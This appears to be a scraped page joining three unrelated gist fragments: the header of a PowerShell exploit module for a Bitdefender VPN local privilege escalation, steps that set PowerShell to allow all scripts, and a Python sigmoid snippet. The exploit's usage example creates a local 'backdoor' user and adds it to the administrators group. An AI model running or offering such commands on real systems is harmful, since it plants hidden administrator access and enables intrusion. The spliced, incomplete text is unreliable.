This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Exploit module for Bitdefender VPN for Windows | |
.Parameter Command | |
Command(s) to be executed when openvpn.exe is started | |
.Example | |
Import-Module .\Invoke-ExploitBdVpnLpe.psm1 | |
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Open Run Command/Console ( Win + R ) | |
Type: gpedit.msc (Group Policy Editor) | |
Browse to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Windows Components -> Windows Powershell. | |
Enable "Turn on Script Execution" | |
Set the policy as needed. I set mine to "Allow all scripts". |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#import section | |
from matplotlib import pylab | |
import pylab as plt | |
import numpy as np | |
#sigmoid = lambda x: 1 / (1 + np.exp(-x)) | |
def sigmoid(x): | |
return (1 / (1 + np.exp(-x))) | |
mySamples = [] |